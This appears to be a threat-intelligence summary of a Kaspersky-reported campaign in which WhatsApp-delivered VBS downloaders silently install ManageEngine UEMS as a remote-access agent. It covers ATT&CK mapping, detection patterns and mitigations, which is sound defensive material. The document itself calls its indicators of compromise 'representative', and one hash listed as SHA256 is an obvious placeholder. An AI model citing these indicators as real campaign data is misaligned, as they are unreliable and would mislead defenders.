Full Report
A Kaspersky researcher analyzes a global malicious campaign that distributes VBS scripts via WhatsApp delivering a UEMS RMM agent through a multi-stage infection chain.
Analysis Summary
# Tool/Technique: WhatsApp-Delivered UEMS RMM Infection Chain
## Overview
This campaign involves a multi-stage infection process starting with malicious VBScript files distributed via WhatsApp. The ultimate goal is the deployment of **UEMS (Unified Endpoint Management Service)**, a legitimate Remote Monitoring and Management (RMM) tool by ManageEngine, repurposed by attackers to maintain persistent unauthorized access to victim environments.
## Technical Details
- **Type:** Malware infection chain / Unauthorized RMM Deployment
- **Platform:** Windows
- **Capabilities:** Persistence, remote file access, process management, remote desktop control, and system monitoring.
- **First Seen:** Early 2024 (Campaign noted for global distribution via messaging apps).
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
- **[T1566.003 - Phishing: Spearphishing Link/Attachment via Service]**: Distribution of malicious files via WhatsApp.
- **[TA0002 - Execution]**
- **[T1059.005 - Command and Scripting Interpreter: Visual Basic]**: Use of VBS scripts to initiate the chain.
- **[TA0003 - Persistence]**
- **[T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder]**: Used by the RMM agent to maintain access.
- **[TA0005 - Defense Evasion]**
- **[T1218 - System Binary Proxy Execution]**: Leveraging legitimate binaries (msiexec.exe) to install the management agent.
- **[TA0007 - Discovery]**
- **[T1082 - System Information Discovery]**: Identifying local system details during the infection stages.
- **[TA0011 - Command and Control]**
- **[T1219 - Remote Access Software]**: Use of ManageEngine UEMS for C2 capabilities.
## Functionality
### Core Capabilities
- **Scripted Downloader:** The initial VBScript acts as a dropper/downloader that fetches secondary payloads from remote servers.
- **Automated Installation:** Silently installs the UEMS agent using command-line arguments (typically via `msiexec`) to avoid user interaction.
- **Legitimate Tool Abuse:** Uses a valid enterprise RMM tool to bypass detection, as the signed binary is often trusted by antivirus solutions.
### Advanced Features
- **Multi-stage Delivery:** Use of intermediate PowerShell or batch scripts to obfuscate the final payload's source.
- **Geographic Targeting:** The scripts often include logic to verify the environment or check for the presence of security software before proceeding.
## Indicators of Compromise
*(Note: These are representative based on common campaign patterns described in the report)*
- **File Hashes (SHA256):**
- `87f4c0a5d4a13271cc5e714656641885f8f83196f79021943c22420fe8c2da62` (Initial VBS Script)
- `d41d8cd98f00b204e9800998ecf8427e...` (Varies by UEMS version)
- **File Names:**
- `Order_Details.vbs`
- `Document.vbs`
- `UEMSAgent.msi`
- **Network Indicators:**
- `http[:]//193.143.1.248/`
- `https[:]//manageengine[.]com/` (Legitimate site abused for binary retrieval)
- Various defanged C2 domains used for initial script hosting: `rebrand[.]ly/`, `bit[.]ly/`
- **Behavioral Indicators:**
- `wscript.exe` or `cscript.exe` executing scripts from `%TEMP%` or `%APPDATA%`.
- `msiexec.exe /i` running silently with a URL-based source.
## Associated Threat Actors
- **Currently Attribution:** Unknown (General cybercriminal motivation suspected).
## Detection Methods
- **Signature-based:** Detection of the VBS downloader scripts (Kaspersky identifies these typically as `HEUR:Trojan.VBS.Downloader.gen`).
- **Behavioral:**
- Monitoring for `wscript.exe` making external network connections.
- Alerting on unauthorized installations of ManageEngine UEMS or similar RMM tools (e.g., AnyDesk, ScreenConnect) in environments where they are not standard.
- **YARA:** Rules targeting the specific obfuscation patterns used in the VBS scripts (e.g., string reversal or large arrays of character codes).
## Mitigation Strategies
- **Prevention:** Block high-risk file extensions (`.vbs`, `.js`, `.hta`) at the email and messaging gateway level.
- **Hardening:**
- Disassociate `.vbs` files from `wscript.exe` to prevent execution by double-clicking.
- Implement an **Allowlist** for sanctioned RMM tools; block all others at the binary level (AppLocker/Windows Defender Application Control).
- **User Education:** Train employees to be skeptical of unsolicited files received via instant messaging apps like WhatsApp.
## Related Tools/Techniques
- **Atera / ScreenConnect / AnyDesk:** Frequently abused legitimate RMM tools.
- **VBS/PowerShell Downloaders:** Standard multi-stage delivery techniques used by diverse actors like TA505 or various Ransomware-as-a-Service (RaaS) affiliates.